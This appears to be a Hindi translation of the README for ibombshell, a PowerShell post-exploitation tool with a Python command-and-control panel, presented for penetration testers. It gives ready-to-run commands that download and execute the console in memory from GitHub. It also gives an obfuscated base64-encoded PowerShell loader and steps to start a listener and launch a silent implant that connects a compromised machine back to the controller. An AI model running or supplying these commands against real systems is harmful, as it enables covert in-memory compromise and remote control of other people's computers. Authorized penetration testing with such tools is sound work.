
किसी भी समय पोस्ट-एक्सप्लॉइटेशन प्रॉम्प्ट तैनात करने का उपकरण
,--.!, _ ____ __ _____ __ ____
__/ -*- (_) __ )____ ____ ___ / /_ / ___// /_ ___ / / /
,d08b. '|` / / __ / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
0088MM / / /_/ / /_/ / / / / / / /_/ /__/ / / / __/ / /
`9MMP' /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/
[+] कंसोल शुरू हो रहा है...
[*] कंसोल तैयार!
ibombshell एक उपकरण है जो Powershell में लिखा गया है जो आपको किसी भी समय पोस्ट-एक्सप्लॉइटेशन कार्यक्षमताओं (और कुछ मामलों में एक्सप्लॉइटेशन) के साथ एक प्रॉम्प्ट प्राप्त करने की अनुमति देता है। यह एक शेल है जो सीधे मेमोरी में डाउनलोड किया जाता है जो बड़ी संख्या में पेनटेस्टिंग सुविधाओं तक पहुंच प्रदान करता है। ये कार्यक्षमताएं सीधे मेमोरी में, एक Powershell फ़ंक्शन के रूप में डाउनलोड की जा सकती हैं। निष्पादन के इस रूप को हर जगह के रूप में जाना जाता है।
इसके अलावा, ibombshell एक दूसरा निष्पादन मोड प्रदान करता है जिसे साइलेंटली कहा जाता है, ताकि पेनटेस्टर ibombshell का एक उदाहरण (जिसे वारियर कहा जाता है) निष्पादित कर सके। समझौता किया गया कंप्यूटर HTTP के माध्यम से C2 पैनल से जुड़ा होगा। इसलिए, वारियर को नियंत्रित करना और पेनटेस्टर की मदद करने वाले फ़ंक्शन को मेमोरी में लोड करना संभव होगा। यह पोस्ट-एक्सप्लॉइटेशन चरण के भीतर हो रहा है।
ibombshell हर जगह चलाने के लिए PowerShell 3.0 या उच्चतर होना अनिवार्य है। विंडोज़ के अलावा अन्य ऑपरेटिंग सिस्टम के लिए आप इसके बारे में PowerShell GitHub - PowerShell for every system! पर अधिक पढ़ सकते हैं।
ibombshell साइलेंट मोड चलाने के लिए आपको python 3.6 और कुछ python लाइब्रेरीज़ की आवश्यकता है। आप इसे इसके साथ स्थापित कर सकते हैं:
cd ibombshell\ c2/
pip install -r requirements.txt
नोट: ibombshell C2 python 3.X में काम करता है। सुनिश्चित करें कि आप इस संस्करण से संबंधित pip चलाते हैं।
ibombshell के दो निष्पादन मोड हैं:
ibombshell लोड करने के लिए बस PowerShell पर चलाएँ:
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)
अब आप डाउनलोड की गई ibombshell कंसोल को इस प्रकार चला सकते हैं:
console
यदि आपको अलग-अलग वातावरणों में ibombshell का उपयोग करने की आवश्यकता है, तो आपको पहले अपने कंप्यूटर को नेटवर्क वातावरण में तैयार करना होगा। उन सभी फ़ंक्शन को लोड करें जिनकी आपको आवश्यकता होगी, और savefunctions का उपयोग करके उन्हें विंडोज़ रजिस्ट्री में सहेजें।
अब आप ibombshell प्राप्त करने के लिए इस बेस 64 कोड का उपयोग कर सकते हैं:
powershell.exe -E "JABwAGEAdABoACAAPQAgACcAaABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAYwBsAGEAcwBzAGUAcwBcAGkAYgBvAG0AYgBzAGgAZQBsAGwAXABjAG8AbgBzAG8AbABlACcAOwAgAHQAcgB5ACAAewAJAGkAZgAoAHQAZQ
BzAHQALQBwAGEAdABoACAAJABwAGEAdABoACkAIAB7ACAAJABjAG8AbgBzAG8AbABlACAAPQAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAcABhAHQAaAApAC4ATgBhAG0AZQA7ACAAYwBkACAAaABrAGMAdQA6
ADsAIAAkAG4AYQBtAGUAIAA9ACAAJABjAG8AbgBzAG8AbABlAC4AcwBwAGwAaQB0ACgAIgBcACIAKQBbAC0AMQBdADsAIAAkAGMAbwBkAGUAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABjAG
8AbgBzAG8AbABlACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAUAByAG8AcABlAHIAdAB5ACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUA
YwB0ACAAewBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcABzAG8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIABAAHsAIgBwAHIAbwBwAGUAcgB0AHkAIgA9ACQAXwA7ACAAIgBWAGEAbAB1AGUAIgAgAD0AIAAoAEcAZQ
B0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAYwBvAG4AcwBvAGwAZQAiACAALQBOAGEAbQBlACAAJABfACkALgAkAF8AfQB9ACkALgBWAGEAbAB1AGUAOwAgACQAYwBvAGQAZQAgAHwAIABv
AHUAdAAtAHMAdAByAGkAbgBnACAAfAAgAGkAZQB4ADsAIABjADoAOwAgAGMAbwBuAHMAbwBsAGUAOwB9AH0AYwBhAHQAYwBoAHsAdwByAGkAdABlAC0AaABvAHMAdAAgACQARQByAHIAbwByAFsAMABdAH0A"
यह संस्करण आपको ibombshell कंसोल चलाने और python में बने C2 पैनल से इसे दूरस्थ रूप से नियंत्रित करने की अनुमति देता है। इस संस्करण को चलाने के लिए, पहले आपको powershell में कंसोल प्रक्रिया शुरू करनी होगी:
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)
ibombshell C2 पथ पर, C2 तैयार करें:
python3 ibombshell.py
और वह लिसनर बनाएँ जहाँ वारियर कनेक्ट होंगे:
iBombShell> load modules/listener.py
[+] मॉड्यूल लोड हो रहा है...
[+] मॉड्यूल लोड हो गया!
iBombShell[modules/listener.py]> run
डिफ़ॉल्ट लिसनर पोर्ट 8080 है। अंत में आप होस्ट पर साइलेंट मोड में कंसोल लॉन्च कर सकते हैं ताकि दूरस्थ नियंत्रण प्राप्त कर सकें:
console -Silently -uriConsole http://[ip or domain]:[port]
ibombshell नियंत्रण पैनल का मूल संचालन निम्नलिखित योजना का अनुसरण करता है:
ibombshell C2
| |
| newibombshell |
+--------------------->| --+ register
| |<--+ from IP
| get functions |
| and instructions |
+--------------------->|
| |
| send functions |
| and instructions |
execute +-- |<---------------------+
+-->| |
| results |
+--------------------->|
| |
हमने एक docker कंटेनर बनाया है जिसमें इसे काम करने के लिए आवश्यक सब कुछ है। Dockerfile स्थान से यह आदेश चलाएँ।
sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell
कुछ उदाहरण वीडियो...